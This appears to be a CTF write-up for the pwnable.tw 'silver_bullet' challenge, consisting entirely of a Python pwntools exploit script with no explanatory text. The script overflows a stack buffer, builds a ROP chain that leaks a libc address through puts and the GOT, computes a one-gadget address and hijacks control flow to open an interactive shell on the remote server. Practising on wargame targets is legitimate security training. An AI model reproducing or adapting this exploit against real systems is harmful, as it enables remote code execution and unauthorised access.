[pwnable.tw] silver_bullet write-up

pwnable/pwnable.tw
[pwnable.tw] silver_bullet write-up

ba0bab 2018. 9. 29. 01:29
from pwn import *



s = remote("chall.pwnable.tw", 10103)
e = ELF("./silver_bullet")
libc = ELF("./libc_32.so.6")
context.log_level = 'debug'

pr = 0x08048475

s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("A"*47)

s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
s.send("a")

s.recvuntil("choice :")
s.sendline("2")

s.recvuntil(":")

payload = "\xff\xff\xff\xff\xff\xff\xff"
payload += p32(e.plt['puts'])
payload += p32(pr)
payload += p32(e.got['puts'])
payload  += p32(0x08048954)

s.sendline(payload)

s.recvuntil("choice :")
s.sendline("3")

s.recvuntil("!!\n")
libc_leak=u32(s.recv(4))
log.success(hex(libc_leak))
base = libc_leak - libc.symbols['puts']
log.success(hex(base))
magic = base + 0x3a819
log.success(hex(magic))

#######
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("A"*47)

s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
s.send("a")

s.recvuntil("choice :")
s.sendline("2")

s.recvuntil(":")

payload = '\xff'*7
payload += p32(magic)

s.sendline(payload)

s.recvuntil("choice :")
s.sendline("3")

s.interactive()